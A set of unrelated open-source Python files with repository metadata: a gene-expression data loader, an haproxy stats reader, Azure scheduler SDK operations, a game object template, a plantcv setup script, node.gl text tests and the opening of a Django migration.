os.system("%s < ../schemas/kb_schema_ome_views.sql > psql.log 2>&1" % (settings.psql_full))
print "reset done"
from trnlib.omeORM import *
session = Session()
session.execute("delete from datasets where name like 'affyexp%';")
session.commit()
ec2_dataset = session.get_or_create(Dataset,
name="ec2 affy data", lab="sbrg", institution="ucsd")
ec2_exp_set = session.get_or_create(ExperimentSet,
dataset=ec2_dataset, type="affy")
process_array_expression_data(session, folder, "ec2", experiment_set=ec2_exp_set)
|
{
"content_hash": "0a5f74a9390acc8e73141dc08d641c46",
"timestamp": "",
"source": "github",
"line_count": 236,
"max_line_length": 142,
"avg_line_length": 44.08898305084746,
"alnum_prop": 0.6249879865449304,
"repo_name": "steve-federowicz/om",
"id": "4d7640224e258926ad2e366bd58f622405edb048",
"size": "10405",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "om/loading/array_expression.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "42989"
},
{
"name": "Python",
"bytes": "197913"
},
{
"name": "Shell",
"bytes": "6704"
}
],
"symlink_target": ""
}
|
import os
import socket
import sys
import csv
HAPROXY_DIR = '/var/lib/contrail/loadbalancer/haproxy/'
STATS_MAP = {
'active_connections': 'qcur',
'max_connections': 'qmax',
'current_sessions': 'scur',
'max_sessions': 'smax',
'total_sessions': 'stot',
'bytes_in': 'bin',
'bytes_out': 'bout',
'connection_errors': 'econ',
'response_errors': 'eresp',
'status': 'status',
'health': 'check_status',
'failed_checks': 'chkfail'
}
# 1 + 2 + 4 = 7 for frontend + backend + server
REQUEST_TYPE = 7
# response types
TYPE_FRONTEND_RESPONSE = '0'
TYPE_BACKEND_RESPONSE = '1'
TYPE_SERVER_RESPONSE = '2'
class HaproxyStats(object):
def __init__(self):
self.lbaas_dir = HAPROXY_DIR
pass
def get_stats(self, pool_id):
sock_path = os.path.join(self.lbaas_dir, pool_id, 'haproxy.sock')
if not os.path.exists(sock_path):
sys.stderr.write('\nStats socket not found for pool ' + pool_id)
return {}
lb_stats = {}
lb_stats.setdefault('listener', [])
lb_stats.setdefault('pool', [])
lb_stats.setdefault('member', [])
raw_stats = self._read_stats(sock_path)
row_count = 0
for row in csv.DictReader(raw_stats.lstrip('# ').splitlines()):
row_count = row_count + 1
if row.get('type') == TYPE_FRONTEND_RESPONSE:
lb_stats['listener'].append(self._get_stats(row, row['pxname']))
elif row.get('type') == TYPE_BACKEND_RESPONSE:
lb_stats['pool'].append(self._get_stats(row, row['pxname']))
elif row.get('type') == TYPE_SERVER_RESPONSE:
lb_stats['member'].append(self._get_stats(row, row['svname']))
if (row_count == 0):
return {}
return lb_stats
def _get_stats(self, row, name):
stats = dict((k, row.get(v, ''))
for k, v in STATS_MAP.items())
stats['name'] = name
stats['vrouter'] = socket.gethostname()
if stats['status'] in ['no check', 'UP', 'OPEN']:
stats['status'] = 'ACTIVE'
else:
stats['status'] = 'DOWN'
return stats
def _read_stats(self, socket_path):
raw_stats = ''
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(socket_path)
s.send('show stat -1 %s -1\n' % REQUEST_TYPE)
chunk_size = 1024
while True:
chunk = s.recv(chunk_size)
raw_stats += chunk
if len(chunk) < chunk_size:
break
except socket.error as e:
sys.stderr.write('\nstats socket error: ' + str(e))
return raw_stats
|
{
"content_hash": "c2105f5068fcf6cfa49d0fe1dc47628b",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 80,
"avg_line_length": 31.96511627906977,
"alnum_prop": 0.5405602037104401,
"repo_name": "codilime/contrail-controller",
"id": "aef4b325cc0df7478a6378296be4c00f847f1872",
"size": "2749",
"binary": false,
"copies": "2",
"ref": "refs/heads/windows3.1",
"path": "src/nodemgr/vrouter_nodemgr/haproxy_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "96717"
},
{
"name": "C++",
"bytes": "20662554"
},
{
"name": "CSS",
"bytes": "531"
},
{
"name": "GDB",
"bytes": "44610"
},
{
"name": "HTML",
"bytes": "519766"
},
{
"name": "Java",
"bytes": "171966"
},
{
"name": "LLVM",
"bytes": "2937"
},
{
"name": "Lua",
"bytes": "19459"
},
{
"name": "Makefile",
"bytes": "12449"
},
{
"name": "PowerShell",
"bytes": "1784"
},
{
"name": "Python",
"bytes": "5590763"
},
{
"name": "Roff",
"bytes": "40925"
},
{
"name": "Shell",
"bytes": "52721"
},
{
"name": "Thrift",
"bytes": "8382"
},
{
"name": "Yacc",
"bytes": "35530"
}
],
"symlink_target": ""
}
|
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class JobCollectionsOperations(object):
"""JobCollectionsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def list_by_subscription(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all job collections under specified subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`JobCollectionDefinitionPaged
<azure.mgmt.scheduler.models.JobCollectionDefinitionPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Scheduler/jobCollections'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all job collections under specified resource group.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`JobCollectionDefinitionPaged
<azure.mgmt.scheduler.models.JobCollectionDefinitionPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.JobCollectionDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get(
self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
"""Gets a job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`JobCollectionDefinition
<azure.mgmt.scheduler.models.JobCollectionDefinition>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobCollectionDefinition', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, job_collection_name, job_collection, custom_headers=None, raw=False, **operation_config):
"""Provisions a new job collection or updates an existing job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param job_collection: The job collection definition.
:type job_collection: :class:`JobCollectionDefinition
<azure.mgmt.scheduler.models.JobCollectionDefinition>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`JobCollectionDefinition
<azure.mgmt.scheduler.models.JobCollectionDefinition>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(job_collection, 'JobCollectionDefinition')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobCollectionDefinition', response)
if response.status_code == 201:
deserialized = self._deserialize('JobCollectionDefinition', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def patch(
self, resource_group_name, job_collection_name, job_collection, custom_headers=None, raw=False, **operation_config):
"""Patches an existing job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param job_collection: The job collection definition.
:type job_collection: :class:`JobCollectionDefinition
<azure.mgmt.scheduler.models.JobCollectionDefinition>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`JobCollectionDefinition
<azure.mgmt.scheduler.models.JobCollectionDefinition>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(job_collection, 'JobCollectionDefinition')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('JobCollectionDefinition', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete(
self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
"""Deletes a job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.delete(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def enable(
self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
"""Enables all of the jobs in the job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}/enable'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def disable(
self, resource_group_name, job_collection_name, custom_headers=None, raw=False, **operation_config):
"""Disables all of the jobs in the job collection.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param job_collection_name: The job collection name.
:type job_collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Scheduler/jobCollections/{jobCollectionName}/disable'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'jobCollectionName': self._serialize.url("job_collection_name", job_collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(request, header_parameters, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
|
{
"content_hash": "a939eb028caeac51495e55afb0c5bc7a",
"timestamp": "",
"source": "github",
"line_count": 586,
"max_line_length": 155,
"avg_line_length": 46.26109215017065,
"alnum_prop": 0.644914972887233,
"repo_name": "rjschwei/azure-sdk-for-python",
"id": "d5b4f00b0a8c1157443871782a0e4cc59f79d817",
"size": "27583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-scheduler/azure/mgmt/scheduler/operations/job_collections_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8317911"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/furniture/all/shared_frn_all_light_lamp_free_s01.iff"
result.attribute_template_id = 6
result.stfName("frn_n","frn_lamp_free_blueleaf")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "5434e2d98742aceba945f9a4935ff704",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 89,
"avg_line_length": 25.153846153846153,
"alnum_prop": 0.7003058103975535,
"repo_name": "obi-two/Rebelion",
"id": "520302b3b45544d05d6ea0694a01c0e48bbdf3ed",
"size": "472",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/furniture/all/shared_frn_all_light_lamp_free_s01.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
import sys
import setuptools
from setuptools.command.test import test as TestCommand
from codecs import open
from os import path
class PyTest(TestCommand):
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ["--verbose", "tests/tests.py"]
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
try:
import cv2
except ImportError:
raise ImportError("ERROR: OpenCV package 'cv2' not found.")
setuptools.setup(
name='plantcv',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='2.0.dev0',
description='An image processing package for plant phenotyping.',
long_description=long_description,
# The project's main homepage.
url='http://plantcv.danforthcenter.org',
# Author details
author='The PlantCV team',
author_email='plantcv@danforthcenter.org',
# Choose your license
license='MIT',
# Supported platforms
platforms=['Any'],
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='image processing bioinformatics',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=setuptools.find_packages(),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['matplotlib>=1.5', 'numpy>=1.11', 'pandas', 'python-dateutil', 'scipy', 'scikit-image'],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
# extras_require={
# 'test': ['pytest-runner', 'pytest'],
# },
tests_require=['pytest'],
cmdclass={'test': PyTest},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
{
"content_hash": "e2777cc02e084e602be43b20f5e31d11",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 110,
"avg_line_length": 33.595588235294116,
"alnum_prop": 0.6616327423943971,
"repo_name": "AntonSax/plantcv",
"id": "dfa247c072d6f6568e6301973e7c01302d3ed884",
"size": "4569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "465369"
},
{
"name": "Shell",
"bytes": "404"
}
],
"symlink_target": ""
}
|
from pynodegl_utils.misc import scene
from pynodegl_utils.tests.cmp_fingerprint import test_fingerprint
from pynodegl_utils.toolbox.colors import COLORS
import pynodegl as ngl
@test_fingerprint(tolerance=1)
@scene()
def text_0_to_127(_):
s = ""
for y in range(8):
for x in range(16):
c = y << 4 | x
s += chr(c) if c else " "
s += "\n"
return ngl.Text(s)
def _text(**params):
return ngl.Text("This\nis\nnode.gl", font_scale=0.7, padding=8, **params)
@test_fingerprint(tolerance=1)
@scene()
def text_colors(_):
return _text(fg_color=COLORS.rose, bg_color=COLORS.cgreen, bg_opacity=1)
@test_fingerprint(tolerance=1)
@scene()
def text_align_cc(_):
return _text(valign="center", halign="center")
@test_fingerprint(tolerance=1)
@scene()
def text_align_cr(_):
return _text(valign="center", halign="right")
@test_fingerprint(tolerance=1)
@scene()
def text_align_cl(_):
return _text(valign="center", halign="left")
@test_fingerprint(tolerance=1)
@scene()
def text_align_bc(_):
return _text(valign="bottom", halign="center")
@test_fingerprint(tolerance=1)
@scene()
def text_align_br(_):
return _text(valign="bottom", halign="right")
@test_fingerprint(tolerance=1)
@scene()
def text_align_bl(_):
return _text(valign="bottom", halign="left")
@test_fingerprint(tolerance=1)
@scene()
def text_align_tc(_):
return _text(valign="top", halign="center")
@test_fingerprint(tolerance=1)
@scene()
def text_align_tr(_):
return _text(valign="top", halign="right")
@test_fingerprint(tolerance=1)
@scene()
def text_align_tl(_):
return _text(valign="top", halign="left")
|
{
"content_hash": "cbb604535afb73cb96bfc111752a152a",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 77,
"avg_line_length": 20.567901234567902,
"alnum_prop": 0.6596638655462185,
"repo_name": "gopro/gopro-lib-node.gl",
"id": "66481967ce5869a499570b07db87e2600b3c43f4",
"size": "2491",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/text.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2212"
},
{
"name": "C",
"bytes": "1975724"
},
{
"name": "Cython",
"bytes": "24206"
},
{
"name": "GLSL",
"bytes": "48760"
},
{
"name": "Java",
"bytes": "1618"
},
{
"name": "Meson",
"bytes": "44524"
},
{
"name": "Objective-C",
"bytes": "31682"
},
{
"name": "PowerShell",
"bytes": "708"
},
{
"name": "Python",
"bytes": "467615"
},
{
"name": "QML",
"bytes": "11826"
},
{
"name": "Shell",
"bytes": "1649"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Band',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('band_name', models.CharField(max_length=30, verbose_name='Artist')),
('photo', models.ImageField(blank=True, null=True, upload_to='', verbose_name='Picture')),
('notes', models.TextField(blank=True, verbose_name='Extra notes')),
],
options={
'verbose_name': 'Artist',
'verbose_name_plural': 'Artists',
},
),
migrations.CreateModel(
name='Lyrics',
fields=[
